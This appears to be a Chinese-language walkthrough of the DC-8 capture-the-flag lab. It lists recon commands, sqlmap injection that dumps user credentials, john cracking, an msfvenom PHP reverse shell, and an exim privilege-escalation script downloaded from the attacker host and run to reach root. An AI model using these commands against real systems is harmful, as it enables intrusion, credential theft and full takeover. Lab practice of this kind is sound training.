环境搭建
- DC8主机靶场,点击下载
- 导入下载文件,如果报错点击重试
- 更改kali和DC8靶场的网络配置为统一的连接模式
- 靶场官网提示:
需要提升到root权限查看唯一的flag
信息收集
扫描确定IP
使用arp-scan扫描网络,确定靶机IP,使用以下命令
arp-scan -l
扫描端口以及服务
使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令
nmap -sV -p- -A 192.168.223.131
指纹识别
尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令
whatweb -v 192.168.223.131
目录爆破
靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令
dirsearch -u 192.168.223.131
查找漏洞
访问页面
- 进行目录访问,尝试页面点击,观察url变化
- 页面点击后url发生变化出现数字的变化,可以尝试sql注入
- 继续访问其他目录
数据库注入
- 数据库注入成功,显示该注入类型为:布尔盲注、时间盲注、显错注入、联合注入
- 爆破数据库
sqlmap -u "http://192.168.223.131/?nid=1" --dbs
- 爆破数据库表
sqlmap -u "http://192.168.223.131/?nid=1" -D d7db --tables
- 爆破数据表中的列
sqlmap -u "http://192.168.223.131/?nid=1" -D d7db -T users --columns
- 查看用户名密码
sqlmap -u "http://192.168.223.131/?nid=1" -D d7db -T users -C name,pass --dump
使用john解密登录
- 使用john解密
- 两个用户尝试登录,john用户登录成功
尝试写入php反弹shell获取shell
- 使用msf生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
- 在网站内部找php代码写入点
- 将生成的反弹shell复制进去之后保存,等待shell不成功
- 再次复制反弹shell进去,填写view内容提交然后获取到shell
提权
- 尝试提权
sudo -l
uname -a
find / -perm -u=s -type f 2>/dev/null
- 通过搜索漏洞,看到了与find查找内容相似的漏洞脚本
searchsploit 4.9.0
- 确定要使用的而提权脚本
searchsploit exim
- 在kali开启http服务
python -m http.server
- 通过shell尝试查看使用的版本
exim4 --version
- 在有权限的目录下上传提取脚本
cd tmp
wget http://192.168.223.129:8000/46996.sh
ls -l
chmod 777 46.996.sh
./46996.sh
- 执行脚本未成功提权
whoami
- 查看脚本内容,再次使用其中的方式提权
./raptor_exim_wiz -m netcat
./exim4 -m netcat
./46996.sh -m netcat
- 脚本执行成功,提升权限为root
id
whoami
cd root
ls
cat flag.txt
总结
- 使用sqlmap进行sql注入
- msfvenom生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
- 漏洞利用脚本的使用,根据脚本内的提示方法进行使用